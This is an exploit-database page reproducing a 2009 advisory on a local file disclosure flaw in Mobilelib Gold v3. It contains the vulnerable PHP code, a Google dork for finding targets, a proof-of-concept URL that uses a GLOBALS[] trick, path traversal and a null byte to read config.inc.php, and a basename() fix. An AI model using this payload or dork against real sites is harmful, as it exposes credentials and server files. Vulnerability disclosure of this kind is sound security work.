header-logo
Suggest Exploit
vendor:
Mobilelib Gold
by:
Qabandi
7,5
CVSS
HIGH
Local File Disclosure
22
CWE
Product Name: Mobilelib Gold
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:ac4p:mobilelib_gold:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown

Mobilelib Gold v3 Local File Disclosure Vulnerability

Mobilelib Gold v3 is vulnerable to a local file disclosure vulnerability. This vulnerability allows an attacker to read any file on the server, including sensitive files such as /etc/passwd. This vulnerability is due to the fact that the application does not properly sanitize user-supplied input. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Mobilelib Gold v3.
Source

Exploit-DB raw data:

                                            ||          ||   | ||
                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
                                    (  :  /    (_)    /           (      .

                                             ___________________
                                           _/QQQQQQQQQQQQQQQQQQQ\__
                                        __/QQQ/````````````````\QQQ\___
                                      _/QQQQQ/                  \QQQQQQ\
                                     /QQQQ/``                    ```QQQQ\
                                    /QQQQ/                          \QQQQ\
                                   |QQQQ/    By  Qabandi             \QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
                                    \QQQQ\                      __  /QQQQ/
                                     \QQQQ\                    /QQ\_QQQQ/
                                      \QQQQ\                   \QQQQQQQ/
                                       \QQQQQ\                 /QQQQQ/_
                                        ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                           ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                              ```````````````````     `````

=Vuln:		Mobilelib Gold v3 Local File Disclosure Vulnerability
=INFO:		http://www.ac4p.com/
=BUY:  		http://www.ac4p.com/
=Download:      ~~~
=DORK:		intext:"English for dummies"

                                  ____________
                              _-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````

Magic_quotes MUST BE ON :)

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
      {
      if (file_exists("./myhtmlpages/".$page.".html")) {
      $templat="./myhtmlpages/".$page.".html";
      $tempindex=@fopen($templat,"r");
      $html=@fread($tempindex,@filesize($templat));
      @fclose($tempindex);
      } else {
       $html ="<p align=\"center\"> áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.</p>";
      }
      return $html;
}

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
 We will bypass the security, where it takes all _GET variables and scans if
 they contain harmful tags such as the null char (%00) ..etc
 
 We will bypass it by using an old GLOBALS[] trick ;)


http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00


---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
      {
      $page = basename($page); //<---- Added the good old Basename func ;)
      if (file_exists("./myhtmlpages/".$page.".html")) {
      $templat="./myhtmlpages/".$page.".html";
      $tempindex=@fopen($templat,"r");
      $html=@fread($tempindex,@filesize($templat));
      @fclose($tempindex);
      } else {
       $html ="<p align=\"center\"> áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.</p>";
      }
      return $html;
}


---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                                                              \
|      Sec-Code.com ;)  Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!!   |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                           Salamz to All Muslim Hackers.

# milw0rm.com [2009-07-14]

Navigation

Suggest Exploit

Services By CQR